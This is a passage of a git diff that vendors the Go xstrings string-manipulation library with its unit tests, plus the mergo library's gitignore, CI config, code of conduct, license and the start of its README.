+// +// If index is out of range of dst, panic with out of range. +func Insert(dst, src string, index int) string { + return Slice(dst, 0, index) + src + Slice(dst, index, -1) +} + +// Scrub scrubs invalid utf8 bytes with repl string. +// Adjacent invalid bytes are replaced only once. +func Scrub(str, repl string) string { + var buf *bytes.Buffer + var r rune + var size, pos int + var hasError bool + + origin := str + + for len(str) > 0 { + r, size = utf8.DecodeRuneInString(str) + + if r == utf8.RuneError { + if !hasError { + if buf == nil { + buf = &bytes.Buffer{} + } + + buf.WriteString(origin[:pos]) + hasError = true + } + } else if hasError { + hasError = false + buf.WriteString(repl) + + origin = origin[pos:] + pos = 0 + } + + pos += size + str = str[size:] + } + + if buf != nil { + buf.WriteString(origin) + return buf.String() + } + + // No invalid byte. + return origin +} + +// WordSplit splits a string into words. Returns a slice of words. +// If there is no word in a string, return nil. +// +// Word is defined as a locale dependent string containing alphabetic characters, +// which may also contain but not start with `'` and `-` characters. +func WordSplit(str string) []string { + var word string + var words []string + var r rune + var size, pos int + + inWord := false + + for len(str) > 0 { + r, size = utf8.DecodeRuneInString(str) + + switch { + case isAlphabet(r): + if !inWord { + inWord = true + word = str + pos = 0 + } + + case inWord && (r == '\'' || r == '-'): + // Still in word. 
+ + default: + if inWord { + inWord = false + words = append(words, word[:pos]) + } + } + + pos += size + str = str[size:] + } + + if inWord { + words = append(words, word[:pos]) + } + + return words +} diff --git a/vendor/github.com/huandu/xstrings/manipulate_test.go b/vendor/github.com/huandu/xstrings/manipulate_test.go new file mode 100644 index 0000000000..39d413742b --- /dev/null +++ b/vendor/github.com/huandu/xstrings/manipulate_test.go @@ -0,0 +1,142 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. + +package xstrings + +import ( + "strconv" + "strings" + "testing" +) + +func TestReverse(t *testing.T) { + runTestCases(t, Reverse, _M{ + "reverse string": "gnirts esrever", + "中文如何?": "?何如文中", + "中en文混~排怎样?a": "a?样怎排~混文ne中", + }) +} + +func TestSlice(t *testing.T) { + runner := func(str string) (result string) { + defer func() { + if e := recover(); e != nil { + result = e.(string) + } + }() + + strs := split(str) + start, _ := strconv.ParseInt(strs[1], 10, 0) + end, _ := strconv.ParseInt(strs[2], 10, 0) + + result = Slice(strs[0], int(start), int(end)) + return + } + + runTestCases(t, runner, _M{ + sep("abcdefghijk", "3", "8"): "defgh", + sep("来点中文如何?", "2", "7"): "中文如何?", + sep("中en文混~排总是少不了的a", "2", "8"): "n文混~排总", + sep("中en文混~排总是少不了的a", "0", "0"): "", + sep("中en文混~排总是少不了的a", "14", "14"): "", + sep("中en文混~排总是少不了的a", "5", "-1"): "~排总是少不了的a", + sep("中en文混~排总是少不了的a", "14", "-1"): "", + + sep("let us slice out of range", "-3", "3"): "out of range", + sep("超出范围哦", "2", "6"): "out of range", + sep("don't do this", "3", "2"): "out of range", + sep("千gan万de不piao要liang", "19", "19"): "out of range", + }) +} + +func TestPartition(t *testing.T) { + runner := func(str string) string { + input := strings.Split(str, separator) + head, match, tail := Partition(input[0], input[1]) + return sep(head, match, tail) + } + + runTestCases(t, runner, _M{ + sep("hello", "l"): sep("he", "l", "lo"), + 
sep("中文总少不了", "少"): sep("中文总", "少", "不了"), + sep("z这个zh英文混排hao不", "h英文"): sep("z这个z", "h英文", "混排hao不"), + sep("边界tiao件zen能忘", "边界"): sep("", "边界", "tiao件zen能忘"), + sep("尾巴ye别忘le", "忘le"): sep("尾巴ye别", "忘le", ""), + + sep("hello", "x"): sep("hello", "", ""), + sep("不是晩香玉", "晚"): sep("不是晩香玉", "", ""), // Hint: 晩 is not 晚 :) + sep("来ge混排ba", "e 混"): sep("来ge混排ba", "", ""), + }) +} + +func TestLastPartition(t *testing.T) { + runner := func(str string) string { + input := strings.Split(str, separator) + head, match, tail := LastPartition(input[0], input[1]) + return sep(head, match, tail) + } + + runTestCases(t, runner, _M{ + sep("hello", "l"): sep("hel", "l", "o"), + sep("少量中文总少不了", "少"): sep("少量中文总", "少", "不了"), + sep("z这个zh英文ch英文混排hao不", "h英文"): sep("z这个zh英文c", "h英文", "混排hao不"), + sep("边界tiao件zen能忘边界", "边界"): sep("边界tiao件zen能忘", "边界", ""), + sep("尾巴ye别忘le", "尾巴"): sep("", "尾巴", "ye别忘le"), + + sep("hello", "x"): sep("", "", "hello"), + sep("不是晩香玉", "晚"): sep("", "", "不是晩香玉"), // Hint: 晩 is not 晚 :) + sep("来ge混排ba", "e 混"): sep("", "", "来ge混排ba"), + }) +} + +func TestInsert(t *testing.T) { + runner := func(str string) (result string) { + defer func() { + if e := recover(); e != nil { + result = e.(string) + } + }() + + strs := split(str) + index, _ := strconv.ParseInt(strs[2], 10, 0) + result = Insert(strs[0], strs[1], int(index)) + return + } + + runTestCases(t, runner, _M{ + sep("abcdefg", "hi", "3"): "abchidefg", + sep("少量中文是必须的", "混pai", "4"): "少量中文混pai是必须的", + sep("zh英文hun排", "~!", "5"): "zh英文h~!un排", + sep("插在begining", "我", "0"): "我插在begining", + sep("插在ending", "我", "8"): "插在ending我", + + sep("超tian出yuan边tu界po", "foo", "-1"): "out of range", + sep("超tian出yuan边tu界po", "foo", "17"): "out of range", + }) +} + +func TestScrub(t *testing.T) { + runner := func(str string) string { + strs := split(str) + return Scrub(strs[0], strs[1]) + } + + runTestCases(t, runner, _M{ + sep("ab\uFFFDcd\xFF\xCEefg\xFF\xFC\xFD\xFAhijk", "*"): "ab*cd*efg*hijk", + sep("no错误です", "*"): 
"no错误です", + sep("", "*"): "", + }) +} + +func TestWordSplit(t *testing.T) { + runner := func(str string) string { + return sep(WordSplit(str)...) + } + + runTestCases(t, runner, _M{ + "one word": sep("one", "word"), + "一个字:把他给我拿下!": "", + "it's a super-fancy one!!!a": sep("it's", "a", "super-fancy", "one", "a"), + "a -b-c' 'd'e": sep("a", "b-c'", "d'e"), + }) +} diff --git a/vendor/github.com/huandu/xstrings/translate.go b/vendor/github.com/huandu/xstrings/translate.go new file mode 100644 index 0000000000..d86a4cbbd3 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/translate.go @@ -0,0 +1,547 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. + +package xstrings + +import ( + "bytes" + "unicode" + "unicode/utf8" +) + +type runeRangeMap struct { + FromLo rune // Lower bound of range map. + FromHi rune // An inclusive higher bound of range map. + ToLo rune + ToHi rune +} + +type runeDict struct { + Dict [unicode.MaxASCII + 1]rune +} + +type runeMap map[rune]rune + +// Translator can translate string with pre-compiled from and to patterns. +// If a from/to pattern pair needs to be used more than once, it's recommended +// to create a Translator and reuse it. +type Translator struct { + quickDict *runeDict // A quick dictionary to look up rune by index. Only availabe for latin runes. + runeMap runeMap // Rune map for translation. + ranges []*runeRangeMap // Ranges of runes. + mappedRune rune // If mappedRune >= 0, all matched runes are translated to the mappedRune. + reverted bool // If to pattern is empty, all matched characters will be deleted. + hasPattern bool +} + +// NewTranslator creates new Translator through a from/to pattern pair. 
+func NewTranslator(from, to string) *Translator { + tr := &Translator{} + + if from == "" { + return tr + } + + reverted := from[0] == '^' + deletion := len(to) == 0 + + if reverted { + from = from[1:] + } + + var fromStart, fromEnd, fromRangeStep rune + var toStart, toEnd, toRangeStep rune + var fromRangeSize, toRangeSize rune + var singleRunes []rune + + // Update the to rune range. + updateRange := func() { + // No more rune to read in the to rune pattern. + if toEnd == utf8.RuneError { + return + } + + if toRangeStep == 0 { + to, toStart, toEnd, toRangeStep = nextRuneRange(to, toEnd) + return + } + + // Current range is not empty. Consume 1 rune from start. + if toStart != toEnd { + toStart += toRangeStep + return + } + + // No more rune. Repeat the last rune. + if to == "" { + toEnd = utf8.RuneError + return + } + + // Both start and end are used. Read two more runes from the to pattern. + to, toStart, toEnd, toRangeStep = nextRuneRange(to, utf8.RuneError) + } + + if deletion { + toStart = utf8.RuneError + toEnd = utf8.RuneError + } else { + // If from pattern is reverted, only the last rune in the to pattern will be used. + if reverted { + var size int + + for len(to) > 0 { + toStart, size = utf8.DecodeRuneInString(to) + to = to[size:] + } + + toEnd = utf8.RuneError + } else { + to, toStart, toEnd, toRangeStep = nextRuneRange(to, utf8.RuneError) + } + } + + fromEnd = utf8.RuneError + + for len(from) > 0 { + from, fromStart, fromEnd, fromRangeStep = nextRuneRange(from, fromEnd) + + // fromStart is a single character. Just map it with a rune in the to pattern. + if fromRangeStep == 0 { + singleRunes = tr.addRune(fromStart, toStart, singleRunes) + updateRange() + continue + } + + for toEnd != utf8.RuneError && fromStart != fromEnd { + // If mapped rune is a single character instead of a range, simply shift first + // rune in the range. 
+ if toRangeStep == 0 { + singleRunes = tr.addRune(fromStart, toStart, singleRunes) + updateRange() + fromStart += fromRangeStep + continue + } + + fromRangeSize = (fromEnd - fromStart) * fromRangeStep + toRangeSize = (toEnd - toStart) * toRangeStep + + // Not enough runes in the to pattern. Need to read more. + if fromRangeSize > toRangeSize { + fromStart, toStart = tr.addRuneRange(fromStart, fromStart+toRangeSize*fromRangeStep, toStart, toEnd, singleRunes) + fromStart += fromRangeStep + updateRange() + + // Edge case: If fromRangeSize == toRangeSize + 1, the last fromStart value needs be considered + // as a single rune. + if fromStart == fromEnd { + singleRunes = tr.addRune(fromStart, toStart, singleRunes) + updateRange() + } + + continue + } + + fromStart, toStart = tr.addRuneRange(fromStart, fromEnd, toStart, toStart+fromRangeSize*toRangeStep, singleRunes) + updateRange() + break + } + + if fromStart == fromEnd { + fromEnd = utf8.RuneError + continue + } + + fromStart, toStart = tr.addRuneRange(fromStart, fromEnd, toStart, toStart, singleRunes) + fromEnd = utf8.RuneError + } + + if fromEnd != utf8.RuneError { + singleRunes = tr.addRune(fromEnd, toStart, singleRunes) + } + + tr.reverted = reverted + tr.mappedRune = -1 + tr.hasPattern = true + + // Translate RuneError only if in deletion or reverted mode. 
+ if deletion || reverted { + tr.mappedRune = toStart + } + + return tr +} + +func (tr *Translator) addRune(from, to rune, singleRunes []rune) []rune { + if from <= unicode.MaxASCII { + if tr.quickDict == nil { + tr.quickDict = &runeDict{} + } + + tr.quickDict.Dict[from] = to + } else { + if tr.runeMap == nil { + tr.runeMap = make(runeMap) + } + + tr.runeMap[from] = to + } + + singleRunes = append(singleRunes, from) + return singleRunes +} + +func (tr *Translator) addRuneRange(fromLo, fromHi, toLo, toHi rune, singleRunes []rune) (rune, rune) { + var r rune + var rrm *runeRangeMap + + if fromLo < fromHi { + rrm = &runeRangeMap{ + FromLo: fromLo, + FromHi: fromHi, + ToLo: toLo, + ToHi: toHi, + } + } else { + rrm = &runeRangeMap{ + FromLo: fromHi, + FromHi: fromLo, + ToLo: toHi, + ToHi: toLo, + } + } + + // If there is any single rune conflicts with this rune range, clear single rune record. + for _, r = range singleRunes { + if rrm.FromLo <= r && r <= rrm.FromHi { + if r <= unicode.MaxASCII { + tr.quickDict.Dict[r] = 0 + } else { + delete(tr.runeMap, r) + } + } + } + + tr.ranges = append(tr.ranges, rrm) + return fromHi, toHi +} + +func nextRuneRange(str string, last rune) (remaining string, start, end rune, rangeStep rune) { + var r rune + var size int + + remaining = str + escaping := false + isRange := false + + for len(remaining) > 0 { + r, size = utf8.DecodeRuneInString(remaining) + remaining = remaining[size:] + + // Parse special characters. + if !escaping { + if r == '\\' { + escaping = true + continue + } + + if r == '-' { + // Ignore slash at beginning of string. + if last == utf8.RuneError { + continue + } + + start = last + isRange = true + continue + } + } + + escaping = false + + if last != utf8.RuneError { + // This is a range which start and end are the same. + // Considier it as a normal character. 
+ if isRange && last == r { + isRange = false + continue + } + + start = last + end = r + + if isRange { + if start < end { + rangeStep = 1 + } else { + rangeStep = -1 + } + } + + return + } + + last = r + } + + start = last + end = utf8.RuneError + return +} + +// Translate str with a from/to pattern pair. +// +// See comment in Translate function for usage and samples. +func (tr *Translator) Translate(str string) string { + if !tr.hasPattern || str == "" { + return str + } + + var r rune + var size int + var needTr bool + + orig := str + + var output *bytes.Buffer + + for len(str) > 0 { + r, size = utf8.DecodeRuneInString(str) + r, needTr = tr.TranslateRune(r) + + if needTr && output == nil { + output = allocBuffer(orig, str) + } + + if r != utf8.RuneError && output != nil { + output.WriteRune(r) + } + + str = str[size:] + } + + // No character is translated. + if output == nil { + return orig + } + + return output.String() +} + +// TranslateRune return translated rune and true if r matches the from pattern. +// If r doesn't match the pattern, original r is returned and translated is false. 
+func (tr *Translator) TranslateRune(r rune) (result rune, translated bool) { + switch { + case tr.quickDict != nil: + if r <= unicode.MaxASCII { + result = tr.quickDict.Dict[r] + + if result != 0 { + translated = true + + if tr.mappedRune >= 0 { + result = tr.mappedRune + } + + break + } + } + + fallthrough + + case tr.runeMap != nil: + var ok bool + + if result, ok = tr.runeMap[r]; ok { + translated = true + + if tr.mappedRune >= 0 { + result = tr.mappedRune + } + + break + } + + fallthrough + + default: + var rrm *runeRangeMap + ranges := tr.ranges + + for i := len(ranges) - 1; i >= 0; i-- { + rrm = ranges[i] + + if rrm.FromLo <= r && r <= rrm.FromHi { + translated = true + + if tr.mappedRune >= 0 { + result = tr.mappedRune + break + } + + if rrm.ToLo < rrm.ToHi { + result = rrm.ToLo + r - rrm.FromLo + } else if rrm.ToLo > rrm.ToHi { + // ToHi can be smaller than ToLo if range is from higher to lower. + result = rrm.ToLo - r + rrm.FromLo + } else { + result = rrm.ToLo + } + + break + } + } + } + + if tr.reverted { + if !translated { + result = tr.mappedRune + } + + translated = !translated + } + + if !translated { + result = r + } + + return +} + +// HasPattern returns true if Translator has one pattern at least. +func (tr *Translator) HasPattern() bool { + return tr.hasPattern +} + +// Translate str with the characters defined in from replaced by characters defined in to. +// +// From and to are patterns representing a set of characters. Pattern is defined as following. +// +// * Special characters +// * '-' means a range of runes, e.g. +// * "a-z" means all characters from 'a' to 'z' inclusive; +// * "z-a" means all characters from 'z' to 'a' inclusive. +// * '^' as first character means a set of all runes excepted listed, e.g. +// * "^a-z" means all characters except 'a' to 'z' inclusive. +// * '\' escapes special characters. +// * Normal character represents itself, e.g. "abc" is a set including 'a', 'b' and 'c'. 
+// +// Translate will try to find a 1:1 mapping from from to to. +// If to is smaller than from, last rune in to will be used to map "out of range" characters in from. +// +// Note that '^' only works in the from pattern. It will be considered as a normal character in the to pattern. +// +// If the to pattern is an empty string, Translate works exactly the same as Delete. +// +// Samples: +// Translate("hello", "aeiou", "12345") => "h2ll4" +// Translate("hello", "a-z", "A-Z") => "HELLO" +// Translate("hello", "z-a", "a-z") => "svool" +// Translate("hello", "aeiou", "*") => "h*ll*" +// Translate("hello", "^l", "*") => "**ll*" +// Translate("hello ^ world", `\^lo`, "*") => "he*** * w*r*d" +func Translate(str, from, to string) string { + tr := NewTranslator(from, to) + return tr.Translate(str) +} + +// Delete runes in str matching the pattern. +// Pattern is defined in Translate function. +// +// Samples: +// Delete("hello", "aeiou") => "hll" +// Delete("hello", "a-k") => "llo" +// Delete("hello", "^a-k") => "he" +func Delete(str, pattern string) string { + tr := NewTranslator(pattern, "") + return tr.Translate(str) +} + +// Count how many runes in str match the pattern. +// Pattern is defined in Translate function. +// +// Samples: +// Count("hello", "aeiou") => 3 +// Count("hello", "a-k") => 3 +// Count("hello", "^a-k") => 2 +func Count(str, pattern string) int { + if pattern == "" || str == "" { + return 0 + } + + var r rune + var size int + var matched bool + + tr := NewTranslator(pattern, "") + cnt := 0 + + for len(str) > 0 { + r, size = utf8.DecodeRuneInString(str) + str = str[size:] + + if _, matched = tr.TranslateRune(r); matched { + cnt++ + } + } + + return cnt +} + +// Squeeze deletes adjacent repeated runes in str. +// If pattern is not empty, only runes matching the pattern will be squeezed. 
+// +// Samples: +// Squeeze("hello", "") => "helo" +// Squeeze("hello", "m-z") => "hello" +// Squeeze("hello world", " ") => "hello world" +func Squeeze(str, pattern string) string { + var last, r rune + var size int + var skipSqueeze, matched bool + var tr *Translator + var output *bytes.Buffer + + orig := str + last = -1 + + if len(pattern) > 0 { + tr = NewTranslator(pattern, "") + } + + for len(str) > 0 { + r, size = utf8.DecodeRuneInString(str) + + // Need to squeeze the str. + if last == r && !skipSqueeze { + if tr != nil { + if _, matched = tr.TranslateRune(r); !matched { + skipSqueeze = true + } + } + + if output == nil { + output = allocBuffer(orig, str) + } + + if skipSqueeze { + output.WriteRune(r) + } + } else { + if output != nil { + output.WriteRune(r) + } + + last = r + skipSqueeze = false + } + + str = str[size:] + } + + if output == nil { + return orig + } + + return output.String() +} diff --git a/vendor/github.com/huandu/xstrings/translate_test.go b/vendor/github.com/huandu/xstrings/translate_test.go new file mode 100644 index 0000000000..0a6acb1b93 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/translate_test.go @@ -0,0 +1,96 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. 
+ +package xstrings + +import ( + "fmt" + "strings" + "testing" +) + +func TestTranslate(t *testing.T) { + runner := func(str string) string { + input := strings.Split(str, separator) + return Translate(input[0], input[1], input[2]) + } + + runTestCases(t, runner, _M{ + sep("hello", "aeiou", "12345"): "h2ll4", + sep("hello", "aeiou", ""): "hll", + sep("hello", "a-z", "A-Z"): "HELLO", + sep("hello", "z-a", "a-z"): "svool", + sep("hello", "aeiou", "*"): "h*ll*", + sep("hello", "^l", "*"): "**ll*", + sep("hello", "p-z", "*"): "hello", + sep("hello ^ world", `\^lo`, "*"): "he*** * w*r*d", + + sep("中文字符测试", "文中谁敢试?", "123456"): "21字符测5", + sep("中文字符测试", "^文中谁敢试?", "123456"): "中文666试", + sep("中文字符测试", "字-试", "0-9"): "中90999", + + sep("h1e2l3l4o, w5o6r7l8d", "a-z,0-9", `A-Z\-a-czk-p`): "HbEcLzLkO- WlOmRnLoD", + sep("h1e2l3l4o, w5o6r7l8d", "a-zoh-n", "b-zakt-z"): "t1f2x3x4k, x5k6s7x8e", + sep("h1e2l3l4o, w5o6r7l8d", "helloa-zoh-n", "99999b-zakt-z"): "t1f2x3x4k, x5k6s7x8e", + + sep("hello", "e-", "p"): "hpllo", + sep("hello", "-e-", "p"): "hpllo", + sep("hello", "----e---", "p"): "hpllo", + sep("hello", "^---e----", "p"): "peppp", + + sep("hel\uFFFDlo", "\uFFFD", "H"): "helHlo", + sep("hel\uFFFDlo", "^\uFFFD", "H"): "HHHHH", + sep("hel\uFFFDlo", "o-\uFFFDh", "H"): "HelHlH", + }) +} + +func TestDelete(t *testing.T) { + runner := func(str string) string { + input := strings.Split(str, separator) + return Delete(input[0], input[1]) + } + + runTestCases(t, runner, _M{ + sep("hello", "aeiou"): "hll", + sep("hello", "a-k"): "llo", + sep("hello", "^a-k"): "he", + + sep("中文字符测试", "文中谁敢试?"): "字符测", + }) +} + +func TestCount(t *testing.T) { + runner := func(str string) string { + input := strings.Split(str, separator) + return fmt.Sprint(Count(input[0], input[1])) + } + + runTestCases(t, runner, _M{ + sep("hello", "aeiou"): "2", + sep("hello", "a-k"): "2", + sep("hello", "^a-k"): "3", + + sep("中文字符测试", "文中谁敢试?"): "3", + }) +} + +func TestSqueeze(t *testing.T) { + runner := func(str 
string) string { + input := strings.Split(str, separator) + return Squeeze(input[0], input[1]) + } + + runTestCases(t, runner, _M{ + sep("hello", ""): "helo", + sep("hello world", ""): "helo world", + sep("hello world", " "): "hello world", + sep("hello world", " "): "hello world", + sep("hello", "a-k"): "hello", + sep("hello", "^a-k"): "helo", + sep("hello", "^a-l"): "hello", + sep("foooo baaaaar", "a"): "foooo bar", + + sep("打打打打个劫!!", ""): "打个劫!", + sep("打打打打个劫!!", "打"): "打个劫!!", + }) +} diff --git a/vendor/github.com/huandu/xstrings/util_test.go b/vendor/github.com/huandu/xstrings/util_test.go new file mode 100644 index 0000000000..1c1bebea00 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/util_test.go @@ -0,0 +1,33 @@ +// Copyright 2015 Huan Du. All rights reserved. +// Licensed under the MIT license that can be found in the LICENSE file. + +package xstrings + +import ( + "strings" + "testing" +) + +type _M map[string]string + +const ( + separator = " ¶ " +) + +func runTestCases(t *testing.T, converter func(string) string, cases map[string]string) { + for k, v := range cases { + s := converter(k) + + if s != v { + t.Fatalf("case fails. 
[case:%v]\nshould => %#v\nactual => %#v", k, v, s) + } + } +} + +func sep(strs ...string) string { + return strings.Join(strs, separator) +} + +func split(str string) []string { + return strings.Split(str, separator) +} diff --git a/vendor/github.com/imdario/mergo/.gitignore b/vendor/github.com/imdario/mergo/.gitignore new file mode 100644 index 0000000000..529c3412ba --- /dev/null +++ b/vendor/github.com/imdario/mergo/.gitignore @@ -0,0 +1,33 @@ +#### joe made this: http://goel.io/joe + +#### go #### +# Binaries for programs and plugins +*.exe +*.dll +*.so +*.dylib + +# Test binary, build with `go test -c` +*.test + +# Output of the go coverage tool, specifically when used with LiteIDE +*.out + +# Project-local glide cache, RE: https://github.com/Masterminds/glide/issues/736 +.glide/ + +#### vim #### +# Swap +[._]*.s[a-v][a-z] +[._]*.sw[a-p] +[._]s[a-v][a-z] +[._]sw[a-p] + +# Session +Session.vim + +# Temporary +.netrwhist +*~ +# Auto-generated tag files +tags diff --git a/vendor/github.com/imdario/mergo/.travis.yml b/vendor/github.com/imdario/mergo/.travis.yml new file mode 100644 index 0000000000..b13a50ed1f --- /dev/null +++ b/vendor/github.com/imdario/mergo/.travis.yml @@ -0,0 +1,7 @@ +language: go +install: + - go get -t + - go get golang.org/x/tools/cmd/cover + - go get github.com/mattn/goveralls +script: + - $HOME/gopath/bin/goveralls -service=travis-ci -repotoken $COVERALLS_TOKEN diff --git a/vendor/github.com/imdario/mergo/CODE_OF_CONDUCT.md b/vendor/github.com/imdario/mergo/CODE_OF_CONDUCT.md new file mode 100644 index 0000000000..469b44907a --- /dev/null +++ b/vendor/github.com/imdario/mergo/CODE_OF_CONDUCT.md @@ -0,0 +1,46 @@ +# Contributor Covenant Code of Conduct + +## Our Pledge + +In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender 
identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation. + +## Our Standards + +Examples of behavior that contributes to creating a positive environment include: + +* Using welcoming and inclusive language +* Being respectful of differing viewpoints and experiences +* Gracefully accepting constructive criticism +* Focusing on what is best for the community +* Showing empathy towards other community members + +Examples of unacceptable behavior by participants include: + +* The use of sexualized language or imagery and unwelcome sexual attention or advances +* Trolling, insulting/derogatory comments, and personal or political attacks +* Public or private harassment +* Publishing others' private information, such as a physical or electronic address, without explicit permission +* Other conduct which could reasonably be considered inappropriate in a professional setting + +## Our Responsibilities + +Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior. + +Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful. + +## Scope + +This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers. 
+ +## Enforcement + +Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at i@dario.im. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately. + +Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership. + +## Attribution + +This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version] + +[homepage]: http://contributor-covenant.org +[version]: http://contributor-covenant.org/version/1/4/ diff --git a/vendor/github.com/imdario/mergo/LICENSE b/vendor/github.com/imdario/mergo/LICENSE new file mode 100644 index 0000000000..686680298d --- /dev/null +++ b/vendor/github.com/imdario/mergo/LICENSE @@ -0,0 +1,28 @@ +Copyright (c) 2013 Dario Castañé. All rights reserved. +Copyright (c) 2012 The Go Authors. All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: + + * Redistributions of source code must retain the above copyright +notice, this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above +copyright notice, this list of conditions and the following disclaimer +in the documentation and/or other materials provided with the +distribution. + * Neither the name of Google Inc. nor the names of its +contributors may be used to endorse or promote products derived from +this software without specific prior written permission. 
+ +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR +A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT +LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, +DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY +THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT +(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/vendor/github.com/imdario/mergo/README.md b/vendor/github.com/imdario/mergo/README.md new file mode 100644 index 0000000000..d1cefa8718 --- /dev/null +++ b/vendor/github.com/imdario/mergo/README.md @@ -0,0 +1,222 @@ +# Mergo + +A helper to merge structs and maps in Golang. Useful for configuration default values, avoiding messy if-statements. + +Also a lovely [comune](http://en.wikipedia.org/wiki/Mergo) (municipality) in the Province of Ancona in the Italian region of Marche. + +## Status + +It is ready for production use. [It is used in several projects by Docker, Google, The Linux Foundation, VMWare, Shopify, etc](https://github.com/imdario/mergo#mergo-in-the-wild). 
+ +[![GoDoc][3]][4] +[![GoCard][5]][6] +[![Build Status][1]][2] +[![Coverage Status][7]][8] +[![Sourcegraph][9]][10] + +[1]: https://travis-ci.org/imdario/mergo.png +[2]: https://travis-ci.org/imdario/mergo +[3]: https://godoc.org/github.com/imdario/mergo?status.svg +[4]: https://godoc.org/github.com/imdario/mergo +[5]: https://goreportcard.com/badge/imdario/mergo +[6]: https://goreportcard.com/report/github.com/imdario/mergo +[7]: https://coveralls.io/repos/github/imdario/mergo/badge.svg?branch=master +[8]: https://coveralls.io/github/imdario/mergo?branch=master +[9]: https://sourcegraph.com/github.com/imdario/mergo/-/badge.svg +[10]: https://sourcegraph.com/github.com/imdario/mergo?badge + +### Latest release + +[Release v0.3.4](https://github.com/imdario/mergo/releases/tag/v0.3.4). + +### Important note + +Please keep in mind that in [0.3.2](//github.com/imdario/mergo/releases/tag/0.3.2) Mergo changed `Merge()`and `Map()` signatures to support [transformers](#transformers). An optional/variadic argument has been added, so it won't break existing code. + +If you were using Mergo **before** April 6th 2015, please check your project works as intended after updating your local copy with ```go get -u github.com/imdario/mergo```. I apologize for any issue caused by its previous behavior and any future bug that Mergo could cause (I hope it won't!) in existing projects after the change (release 0.2.0). + +### Donations + +If Mergo is useful to you, consider buying me a coffee, a beer or making a monthly donation so I can keep building great free software. 
:heart_eyes: + +Buy Me a Coffee at ko-fi.com +[![Beerpay](https://beerpay.io/imdario/mergo/badge.svg)](https://beerpay.io/imdario/mergo) +[![Beerpay](https://beerpay.io/imdario/mergo/make-wish.svg)](https://beerpay.io/imdario/mergo) +Donate using Liberapay + +### Mergo in the wild + +- [moby/moby](https://github.com/moby/moby) +- [kubernetes/kubernetes](https://github.com/kubernetes/kubernetes) +- [vmware/dispatch](https://github.com/vmware/dispatch) +- [Shopify/themekit](https://github.com/Shopify/themekit) +- [imdario/zas](https://github.com/imdario/zas) +- [matcornic/hermes](https://github.com/matcornic/hermes) +- [OpenBazaar/openbazaar-go](https://github.com/OpenBazaar/openbazaar-go) +- [kataras/iris](https://github.com/kataras/iris) +- [michaelsauter/crane](https://github.com/michaelsauter/crane) +- [go-task/task](https://github.com/go-task/task) +- [sensu/uchiwa](https://github.com/sensu/uchiwa) +- [ory/hydra](https://github.com/ory/hydra) +- [sisatech/vcli](https://github.com/sisatech/vcli) +- [dairycart/dairycart](https://github.com/dairycart/dairycart) +- [projectcalico/felix](https://github.com/projectcalico/felix) +- [resin-os/balena](https://github.com/resin-os/balena) +- [go-kivik/kivik](https://github.com/go-kivik/kivik) +- [Telefonica/govice](https://github.com/Telefonica/govice) +- [supergiant/supergiant](supergiant/supergiant) +- [SergeyTsalkov/brooce](https://github.com/SergeyTsalkov/brooce) +- [soniah/dnsmadeeasy](https://github.com/soniah/dnsmadeeasy) +- [ohsu-comp-bio/funnel](https://github.com/ohsu-comp-bio/funnel) +- [EagerIO/Stout](https://github.com/EagerIO/Stout) +- [lynndylanhurley/defsynth-api](https://github.com/lynndylanhurley/defsynth-api) +- [russross/canvasassignments](https://github.com/russross/canvasassignments) +- [rdegges/cryptly-api](https://github.com/rdegges/cryptly-api) +- [casualjim/exeggutor](https://github.com/casualjim/exeggutor) +- [divshot/gitling](https://github.com/divshot/gitling) +- 
